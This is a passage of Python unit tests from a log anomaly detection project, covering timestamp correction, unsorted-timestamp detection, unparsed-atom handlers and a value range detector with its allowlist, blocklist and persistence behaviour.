        ecsa = EventClassSelector("Selector1", [cr], None)
        ecsb = EventClassSelector("Selector2", None, [cr])
        rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)]
        tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler])
        t = time.time()
        for offset in (200, 400, 999, 1000):
            self.assertEqual(tcvd.do_timer(t + offset), 10)

    def test3validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class."""
        cr = CorrelationRule("Correlation", 2, 10)
        ecsa = EventClassSelector("Selector1", [cr], None)
        ecsb = EventClassSelector("Selector2", None, [cr])
        rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)]
        config = self.aminer_config

        def handlers():
            # A fresh list per call, so no two detector instances share one handler list.
            return [self.stream_printer_event_handler]

        wrong_types = (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set())
        # The rules argument must be a list of match rules.
        for value in wrong_types:
            self.assertRaises(TypeError, TimeCorrelationViolationDetector, config, value, handlers())
        # anomaly_event_handlers must be a list of handlers.
        for value in wrong_types:
            self.assertRaises(TypeError, TimeCorrelationViolationDetector, config, rules, value)
        # Log resources are only accepted as URIs; a bare filesystem path is rejected.
        self.assertRaises(ValueError, TimeCorrelationViolationDetector, config, rules, handlers(), log_resource_ignore_list=["/tmp/syslog"])
        for value in ("", b"Default", True, 123, 123.22, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, TimeCorrelationViolationDetector, config, rules, handlers(), log_resource_ignore_list=value)
        TimeCorrelationViolationDetector(config, rules, handlers(), log_resource_ignore_list=["file:///tmp/syslog"])

        # EventClassSelector: the action id must be a non-empty str.
        self.assertRaises(ValueError, EventClassSelector, "", [cr], [cr])
        for value in (["default"], None, b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, EventClassSelector, value, [cr], [cr])
        # Both rule lists must hold CorrelationRule objects only.
        not_rule_list = ("", ["default"], [None], b"Default", True, 123, 123.3, {"id": "Default"}, (), set())
        for value in not_rule_list:
            self.assertRaises(TypeError, EventClassSelector, "default", value, [cr])
        for value in not_rule_list:
            self.assertRaises(TypeError, EventClassSelector, "default", [cr], value)
        # At least one of the two sides has to carry a rule.
        self.assertRaises(ValueError, EventClassSelector, "default", None, None)
        self.assertRaises(ValueError, EventClassSelector, "default", [], [])
        for a_rules, b_rules in (([cr, cr], [cr]), (None, [cr]), ([cr], None), ([], [cr]), ([cr], [])):
            EventClassSelector("default", a_rules, b_rules)

        # CorrelationRule: the rule id must be a non-empty str.
        self.assertRaises(ValueError, CorrelationRule, "", 1, 10)
        for value in (["default"], None, b"Default", True, 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, CorrelationRule, value, 1, 10)
        # Both time bounds must be numbers; a numeric string is not accepted.
        not_a_time = ("", ["default"], None, b"Default", True, "123", {"id": "Default"}, (), set())
        for value in not_a_time:
            self.assertRaises(TypeError, CorrelationRule, "default", value, 10)
        for value in not_a_time:
            self.assertRaises(TypeError, CorrelationRule, "default", 1, value)
        # The lower bound may not be negative and must be strictly below the upper bound.
        for lower, upper in ((-1, 10), (10, 1), (10, 10)):
            self.assertRaises(ValueError, CorrelationRule, "default", lower, upper)
        for value in ("", ["default"], b"Default", True, "123", 123, 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=value)
        for value in ("", ["default"], None, b"Default", True, "123", 123.3, {"id": "Default"}, (), set()):
            self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=value)
        CorrelationRule("default", 0, 10, artefact_match_parameters=[("/model/sequence1/Value2Key", "/model/sequence2/Value3Key")])


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimestampCorrectionFiltersTest.py000066400000000000000000000102521500476301700323410ustar00rootroot00000000000000
import unittest
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
from time import time
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext
from datetime import datetime


class TimestampCorrectionFiltersTest(TestBase):
    """Unittests for the TimestampCorrectionFilters."""

    def test1receive_atom(self):
        """Check that the filter forwards every atom, keeps a None timestamp untouched, tracks the latest timestamp seen and
        raises an atom time that lies behind the latest one up to it."""
        match_context = DummyMatchContext(b" pid=")
        fdme = DummyFixedDataModelElement("s1", b" pid=")
        match_element = fdme.get_match_element("match", match_context)
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False)
        smta = SimpleMonotonicTimestampAdjust([nmpd], False)

        def forward(atom_time):
            # Build one atom with the given time, pass it through the filter and hand it back for inspection.
            log_atom = LogAtom(fdme.data, ParserMatch(match_element), atom_time, nmpd)
            self.assertEqual(smta.receive_atom(log_atom), True)
            return log_atom

        # the atom time should not be set automatically if None.
        atom = forward(None)
        self.assertEqual(smta.latest_timestamp_seen, 0)
        self.assertEqual(atom.atom_time, None)

        t = 100
        atom = forward(t)
        self.assertEqual(smta.latest_timestamp_seen, t)
        self.assertEqual(atom.atom_time, t)

        t = atom.atom_time + 100
        atom = forward(t)
        self.assertEqual(smta.latest_timestamp_seen, t)
        self.assertEqual(atom.atom_time, t)

        # An atom dated before the latest timestamp is adjusted up to it.
        atom = forward(t - 1000)
        self.assertEqual(smta.latest_timestamp_seen, t)
        self.assertEqual(atom.atom_time, t)

    def test2validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [""], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [b""], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [True], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [None], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [123], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [123.2], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [{"id": "Default"}], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [["Default"]], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [set()], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [()], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [(nmpd, False)], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], "") self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], None) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], b"Default") self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], 123) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], 123.2) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], {"id": "Default"}) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], ["Default"]) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], []) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], ()) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], set()) SimpleMonotonicTimestampAdjust([nmpd], False) if __name__ == "__main__": unittest.main() 
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimestampsUnsortedDetectorTest.py000066400000000000000000000162601500476301700323660ustar00rootroot00000000000000
import unittest
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
import time
from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext
from datetime import datetime


class TimestampsUnsortedDetectorTest(TestBase):
    """Unit tests for TimestampsUnsortedDetector: event output on falling timestamps and constructor argument validation."""

    def test1receive_atom(self):
        """Feed atoms with rising, then falling, timestamps and check that only a falling timestamp produces an event.

        With exit_on_error_flag set, a falling timestamp must additionally terminate the process with exit code 1.
        """
        template = '%s Timestamp %s below %s\n%s: "None" (%d lines)\n %s\n\n'
        fmt = "%Y-%m-%d %H:%M:%S"
        raw = b" pid="

        def stamp(ts):
            # Render a Unix timestamp the same way the event output does.
            return datetime.fromtimestamp(ts).strftime(fmt)

        model = DummyFixedDataModelElement("s1", raw)
        element = model.get_match_element("match", DummyMatchContext(raw))
        nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False)
        t = time.time()
        atom = LogAtom(model.data, ParserMatch(element), t, nmpd)
        detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, False)
        name = detector.__class__.__name__

        # Increasing timestamps: the atom is accepted and nothing is reported.
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), "")
        atom.set_timestamp(t + 10000)
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), "")

        # Falling back to t is below the last seen t + 10000: the atom is still accepted, but an event is reported.
        atom.set_timestamp(t)
        self.assertTrue(detector.receive_atom(atom))
        self.assertEqual(self.output_stream.getvalue(), template % (stamp(t), stamp(t), stamp(t + 10000), name, 1, " pid="))
        self.reset_output_stream()

        # With exit_on_error_flag set, the next falling timestamp is reported and then terminates the process with code 1.
        detector.exit_on_error_flag = True
        atom.set_timestamp(t - 10000)
        with self.assertRaises(SystemExit) as cm:
            detector.receive_atom(atom)
        self.assertEqual(cm.exception.code, 1)
        self.assertEqual(self.output_stream.getvalue(), template % (stamp(t - 10000), stamp(t - 10000), stamp(t), name, 1, " pid="))
        self.reset_output_stream()

    def test2validate_parameters(self):
        """Test all initialization parameters for the detector.

        Wrong types for the event handler list and for the two boolean flags must be rejected with a TypeError;
        correctly typed flags must be accepted.
        """
        not_a_handler_list = (["default"], None, "", b"Default", True, 123, 123.3, {"id": "Default"}, (), set())
        not_a_bool = (b"True", "True", 123, 123.22, {"id": "Default"}, ["Default"], [], (), set())

        # Second positional argument: anything that is not a list of event handlers is rejected.
        for bad in not_a_handler_list:
            self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, bad)

        # exit_on_error_flag must be a bool.
        for bad in not_a_bool:
            self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler],
                              exit_on_error_flag=bad)
        TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=True)

        # output_logline must be a bool; None is rejected as well.
        for bad in (None,) + not_a_bool:
            self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler],
                              output_logline=bad)
        TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], output_logline=True)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/UnparsedAtomHandlersTest.py000066400000000000000000000161271500476301700311070ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector import time from aminer.parsing.ParserMatch import ParserMatch from aminer.input.LogAtom import LogAtom from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext, DummySequenceModelElement from datetime import datetime class SimpleUnparsedAtomHandlerTest(TestBase): """Unittests for the SimpleUnparsedAtomHandler.""" datetime_format_string = "%Y-%m-%d %H:%M:%S" calculation = b"256 * 2 = 512" def test1receive_atom_SimpleUnparsedAtomHandler(self): """Test if the SimpleUnparsedAtomHandler can handle matching log atoms and not matching log atoms.""" t = time.time() fdme = DummyFixedDataModelElement("s1", self.calculation) new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) # match exists match_context = DummyMatchContext(self.calculation) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) simple_unparsed_atom_handler = SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) self.assertFalse(simple_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # match does not exist log_atom = LogAtom(match_element.match_object, None, t, new_match_path_detector1) self.assertTrue(simple_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), f'{datetime.fromtimestamp(t).strftime(self.datetime_format_string)} Unparsed atom received\n' f'{simple_unparsed_atom_handler.__class__.__name__}: "None" (1 lines)\n {self.calculation.decode()}\n\n') 
self.reset_output_stream() def test2_receive_atom_VerboseUnparsedAtomHandler(self): """Test if the VerboseUnparsedAtomHandler can handle matching log atoms and not matching log atoms.""" t = time.time() fdme = DummyFixedDataModelElement("s1", self.calculation) new_match_path_detector1 = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) # match exists match_context = DummyMatchContext(self.calculation) match_element = fdme.get_match_element("match", match_context) log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, new_match_path_detector1) verbose_unparsed_atom_handler = VerboseUnparsedAtomHandler([self.stream_printer_event_handler], fdme) self.assertFalse(verbose_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # match does not exist log_atom = LogAtom(match_element.match_object, None, t, new_match_path_detector1) self.assertTrue(verbose_unparsed_atom_handler.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), f'{datetime.fromtimestamp(t).strftime(self.datetime_format_string)} Unparsed atom received\n' f'{verbose_unparsed_atom_handler.__class__.__name__}: "None" (1 lines)\n Starting match update on "' f'{self.calculation.decode()}"\n Removed: "{self.calculation.decode()}", remaining 0 bytes\n Shortest unmatched ' f'data: ""\n{self.calculation.decode()}\n\n') self.reset_output_stream() def test3validate_parameters_SimpleUnparsedAtomHandler(self): """Test all initialization parameters for the detector. 
Input parameters must be validated in the class.""" self.assertRaises(TypeError, SimpleUnparsedAtomHandler, ["default"]) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, None) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, "") self.assertRaises(TypeError, SimpleUnparsedAtomHandler, b"Default") self.assertRaises(TypeError, SimpleUnparsedAtomHandler, True) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, 123) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, 123.3) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, {"id": "Default"}) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, ()) self.assertRaises(TypeError, SimpleUnparsedAtomHandler, set()) SimpleUnparsedAtomHandler([self.stream_printer_event_handler]) def test4validate_parameters_VerboseUnparsedAtomHandler(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" parsing_model = DummySequenceModelElement("seq", [DummyFixedDataModelElement("s1", b"string"), DummyFixedDataModelElement("sp", b" ")]) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, ["default"], parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, None, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, "", parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, b"Default", parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, True, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, 123, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, 123.3, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, {"id": "Default"}, parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, (), parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, set(), parsing_model) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, 
VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], ["default"]) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VerboseUnparsedAtomHandler, [self.stream_printer_event_handler], set()) VerboseUnparsedAtomHandler([self.stream_printer_event_handler], parsing_model) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/ValueRangeDetectorTest.py000066400000000000000000001067611500476301700305530ustar00rootroot00000000000000import unittest from aminer.analysis.ValueRangeDetector import ValueRangeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD import time from datetime import datetime class ValueRangeDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new value ranges. The VRD is used to learn intervals and detect values outside of these ranges for two different identifiers. 
Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ expected_string = '%s Value range anomaly detected\n%s: "None" (%d lines)\n %s\n\n' datetime_format_string = "%Y-%m-%d %H:%M:%S" t = round(time.time(), 3) # Prepare log atoms that represent two entities (id) with floats (value). Anomalies are generated when ranges are first established. # Then, one identifier (a) has a valid value, while the other one (b) has a value outside the range that generates an anomaly. # The following events are generated: # id: a value: 2.5 # id: b value: 5 # id: a value: 4.75 # id: b value: 6.3 # id: a value: 4.25 # id: b value: 3.1 m_1 = MatchElement("/model/id", b"a", b"a", None) m_2 = MatchElement("/model/value", b"2.5", 2.5, None) match_element_1 = MatchElement("/model", b"a2.5", b"a2.5", [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b"a2.5", parser_match_1, t, None) m_3 = MatchElement("/model/id", b"b", b"b", None) m_4 = MatchElement("/model/value", b"5", 5, None) match_element_2 = MatchElement("/model", b"b5", b"b5", [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b"b5", parser_match_2, t+1, None) m_5 = MatchElement("/model/id", b"a", b"a", None) m_6 = MatchElement("/model/value", b"4.75", 4.75, None) match_element_3 = MatchElement("/model", b"a4.75", b"a4.75", [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b"a4.75", parser_match_3, t+2, None) m_7 = MatchElement("/model/id", b"b", b"b", None) m_8 = MatchElement("/model/value", b"6.3", 6.3, None) match_element_4 = MatchElement("/model", b"b6.3", b"b6.3", [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b"b6.3", parser_match_4, t+3, None) m_9 = MatchElement("/model/id", b"a", b"a", None) m_10 = MatchElement("/model/value", b"4.25", 4.25, None) 
match_element_5 = MatchElement("/model", b"a4.25", b"a4.25", [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b"a4.25", parser_match_5, t+4, None) m_11 = MatchElement("/model/id", b"b", b"b", None) m_12 = MatchElement("/model/value", b"3.1", 3.1, None) match_element_6 = MatchElement("/model", b"b3.1", b"b3.1", [m_11, m_12]) parser_match_6 = ParserMatch(match_element_6) log_atom_6 = LogAtom(b"b3.1", parser_match_6, t+5, None) # learn_mode = True, with id_path_list set # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: None value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), "") # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+2).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_3.raw_data.decode())) self.reset_output_stream() # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # Third value of id (a) is in expected range, thus no anomaly is generated # Input: id: a value: 4.25 # 
Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertEqual(self.output_stream.getvalue(), "") # Third value of id (b) is outside the expected range, thus anomaly is generated value_range_detector.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+5).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_6.raw_data.decode())) self.reset_output_stream() # learn_mode = True, without id_path_list set # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: 2.5 # Expected output: None value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, ["/model/value"], "Default", True, False) value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") # First value of id (b) should not generate an anomaly # Input: id: b value: 5 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+1).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_2.raw_data.decode())) self.reset_output_stream() # Second value of id (a) should generate an anomaly for new range # Input: id: a value: 4.75 # Expected output: None value_range_detector.receive_atom(log_atom_3) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() # Second value of id (b) should generate an anomaly for new range # Input: id: b value: 6.3 # Expected output: Anomaly value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t+3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # Third value of id (a) is in expected range, thus no anomaly is 
generated # Input: id: a value: 4.25 # Expected output: None value_range_detector.receive_atom(log_atom_5) self.assertEqual(self.output_stream.getvalue(), "") # All values are used in only one path, so this value should not produce an anomaly. value_range_detector.receive_atom(log_atom_6) self.assertEqual(self.output_stream.getvalue(), "") # learn_mode = False value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) value_range_detector.ranges = {"min": {}, "max": {}} # setup value_range_detector.receive_atom(log_atom_1) self.assertEqual(self.output_stream.getvalue(), "") value_range_detector.receive_atom(log_atom_2) self.assertEqual(self.output_stream.getvalue(), "") value_range_detector.learn_mode = False value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # repeating should produce the same result value_range_detector.receive_atom(log_atom_4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(datetime_format_string), value_range_detector.__class__.__name__, 1, log_atom_4.raw_data.decode())) self.reset_output_stream() # stop_learning_time value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False, stop_learning_time=100) log_atom_1.atom_time = t value_range_detector.receive_atom(log_atom_1) log_atom_2.atom_time = t + 99 value_range_detector.receive_atom(log_atom_2) self.assertTrue(value_range_detector.learn_mode) log_atom_3.atom_time = t + 101 value_range_detector.receive_atom(log_atom_3) self.assertFalse(value_range_detector.learn_mode) log_atom_2.atom_time = t + 1 log_atom_3.atom_time = t + 2 
# stop_learning_no_anomaly_time value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False, stop_learning_no_anomaly_time=100) log_atom_1.atom_time = t value_range_detector.receive_atom(log_atom_1) log_atom_2.atom_time = t + 99 value_range_detector.receive_atom(log_atom_2) self.assertTrue(value_range_detector.learn_mode) log_atom_3.atom_time = t + 100 value_range_detector.receive_atom(log_atom_3) self.assertTrue(value_range_detector.learn_mode) log_atom_4.atom_time = t + 201 value_range_detector.receive_atom(log_atom_4) self.assertFalse(value_range_detector.learn_mode) log_atom_2.atom_time = t + 1 log_atom_3.atom_time = t + 2 log_atom_4.atom_time = t + 2 def test2do_timer(self): """Test if the do_timer method is implemented properly.""" value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default", True, False) t = time.time() value_range_detector.next_persist_time = t + 400 self.assertEqual(value_range_detector.do_timer(t + 200), 200) self.assertEqual(value_range_detector.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(value_range_detector.do_timer(t + 999), 1) self.assertEqual(value_range_detector.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. value_range_detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], None, "Default", True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, value_range_detector.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The ValueRangeDetector can not handle allowlisting data and therefore an exception is expected. 
        self.assertRaises(Exception, value_range_detector.allowlist_event, analysis % value_range_detector.__class__.__name__,
                          self.output_stream.getvalue(), ["random", "Data"])
        # Allowlist event which is in the ignore_list. If a value from the ignore_list is allowlisted, it should be deleted.
        value_range_detector.ignore_list = ["/s1"]
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(value_range_detector.allowlist_event(analysis % value_range_detector.__class__.__name__, "/s1", None),
                         "Allowlisted path %s." % "/s1")
        self.assertEqual(value_range_detector.constraint_list, ["/s1"])
        self.assertEqual(value_range_detector.ignore_list, [])
        value_range_detector.learn_mode = False
        self.assertEqual(value_range_detector.allowlist_event(analysis % value_range_detector.__class__.__name__, "/d1", None),
                         "Allowlisted path %s." % "/d1")
        self.assertEqual(value_range_detector.constraint_list, ["/s1", "/d1"])

    def test4blocklist_event(self):
        """
        Check blocklist_event.

        Events of a foreign detector class and events carrying blocklisting data are rejected; a blocklisted path is added to
        ignore_list and, if present, removed from constraint_list, independent of learn_mode.
        """
        detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["Default"], None, "Default", True,
                                      output_logline=False)
        own_event = "Analysis.%s" % detector.__class__.__name__
        # An event that belongs to another detector class must be refused.
        self.assertRaises(Exception, detector.blocklist_event, "Analysis.NewMatchPathValueDetector", self.output_stream.getvalue(), None)
        # The ValueRangeDetector accepts no blocklisting data, so passing some must raise as well.
        self.assertRaises(Exception, detector.blocklist_event, own_event, self.output_stream.getvalue(), ["random", "Data"])
        # A path currently in the constraint_list leaves it when it gets blocklisted.
        detector.constraint_list = ["/s1"]
        self.assertEqual(detector.blocklist_event(own_event, "/s1", None), "Blocklisted path /s1.")
        self.assertEqual(detector.ignore_list, ["/s1"])
        self.assertEqual(detector.constraint_list, [])
        # Blocklisting also works once learning is switched off.
        detector.learn_mode = False
        self.assertEqual(detector.blocklist_event(own_event, "/d1", None), "Blocklisted path /d1.")
        self.assertEqual(detector.ignore_list, ["/s1", "/d1"])

    def test5persistence(self):
        """
        Check do_persist and load_persistence_data.

        Two entities (id a and b) report float values; the first occurrences establish the ranges, later ones widen them or fall
        inside them. The resulting min/max per id is persisted, read back from the persistence file and compared with the
        detector's in-memory ranges, for detectors created in and out of learn_mode.
        """
        detector = ValueRangeDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], "Default",
                                      True, False)
        # (id, value as logged, value as parsed) - one log atom each, atom times 1..6 in this order.
        samples = (
            (b"a", b"2.5", 2.5),
            (b"b", b"5", 5),
            (b"a", b"4.75", 4.75),
            (b"b", b"6.3", 6.3),
            (b"a", b"4.25", 4.25),
            (b"b", b"3.1", 3.1),
        )
        atoms = []
        for atom_time, (identifier, raw_value, parsed_value) in enumerate(samples, start=1):
            children = [MatchElement("/model/id", identifier, identifier, None),
                        MatchElement("/model/value", raw_value, parsed_value, None)]
            line = identifier + raw_value
            atoms.append(LogAtom(line, ParserMatch(MatchElement("/model", line, line, children)), atom_time, None))
        for atom in atoms:
            detector.receive_atom(atom)
        detector.do_persist()

        expected_ranges = {"min": {("a",): 2.5, ("b",): 3.1}, "max": {("a",): 4.75, ("b",): 6.3}}
        # A fresh detector with the same persistence_id ends up with the persisted ranges without an explicit load call.
